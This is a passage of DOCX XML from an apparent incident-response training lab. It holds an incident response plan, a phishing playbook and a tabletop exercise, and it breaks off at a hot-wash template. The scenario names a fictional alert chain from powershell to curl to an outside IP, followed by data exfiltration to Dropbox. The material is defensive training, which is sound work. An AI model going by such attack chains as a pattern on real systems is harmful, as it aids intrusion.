          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; ir_plan.md &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Incident Response Plan v1.0</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1. Purpose &amp; scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Covers all production systems and customer data. Aligned to NIST 800-61.</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2. Roles (RACI)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- **Incident Commander (IC)** — Senior SOC lead. Decides comms and escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- **Lead Analyst** — Runs detection, analysis, evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- **Engineering** — Containment / eradication / recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- **Comms** — Customer + media + regulator (Lab 30).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- **Legal** — Privilege, law enforcement, regulatory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- **Executive sponsor** — CISO; signs the closure.</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3. Severity classification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Sev | Definition                            | SLA to declare | Notify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1   | Confirmed data exfil / system-wide    | 15 min         | CISO, CEO, Legal |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 2   | Confirmed compromise, contained scope | 30 min         | CISO   |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 3   | Suspicious activity, unverified       | 1 hr           | SOC mgr |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 4   | Informational                         | next biz day   | none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4. Communication channels</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- War room: #incident-NNN (Slack)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Bridge: conference URL (link)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Out-of-band: pre-shared Signal group (in case primary IdP is compromised)</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5. Tooling list (Preparation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- SIEM, EDR, NDR, SOAR, ticket system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Forensic kit: write-blocker, FTK Imager, Volatility, KAPE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Threat-intel: MISP, AbuseIPDB, VirusTotal Premium</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Comms templates: pre-approved exec, customer, regulator messages</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6. Authority matrix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- IC may shut down a production system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- IC may not talk to media without Comms approval.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Legal may invoke a legal hold (Lab 21).</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7. Business continuity / disaster recovery hand-off</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>If RTO of an isolated system is breached, invoke BC/DR plan ABC-DR-007.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Author a one-page phishing playbook</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; playbook_phishing.md &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Playbook — Phishing email reported by user</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Trigger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>User report or DMARC failure alert.</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Step 1 — Triage (≤ 15 min)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Pull headers (Lab 8). Verify SPF/DKIM/DMARC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Extract URLs / attachments. Hash any attachment (Lab 9).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- VirusTotal + AbuseIPDB on every IOC (Lab 10).</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Step 2 — Scope (≤ 30 min)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Query mail gateway: who else received the message? Block or quarantine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Query SIEM: any user click on the URL? (Web proxy logs.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Query EDR: any process spawned from the attachment?</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Step 3 — Contain (≤ 60 min)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Block sender, URL, hash in email/web/EDR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- For clickers: isolate host (Lab 24), force password reset, invalidate sessions.</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Step 4 — Eradicate / Recover</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Remove every copy from mailboxes (mass purge).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Re-image clicked hosts if RCE confirmed.</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Step 5 — Post-incident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Log IOCs to threat-intel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Update awareness training with the lure (Lab 30).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Run a 45-minute tabletop exercise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Scenario (read aloud at T = 0): &gt; "08:00 — A finance user reports an invoice email looked off but opened it. Outlook closed unexpectedly. At 08:15 EDR alerts on powershell.exe → curl → 185.220.101.45. The user's password was used at 08:30 to log into the file share."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run the clock in 5-minute injects. At each inject the facilitator throws a curveball; the team must say who does what and with which playbook step.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>T+min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Inject</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Initial detect — open ticket, assign IC, declare severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Press starts calling — Comms hat goes on</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>EDR isolation fails on legacy host — alternative containment?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Legal asks: is this notifiable? Which regulator?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fresh DLP alert: 1 GB to Dropbox — exfiltration confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Executive demands status — who briefs and with what template?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Eradication or re-image decision (Lab 24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hot wash: 3 things to fix this week, 1 thing to fix this quarter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Capture lessons learned (post-incident)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; hot_wash.md &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
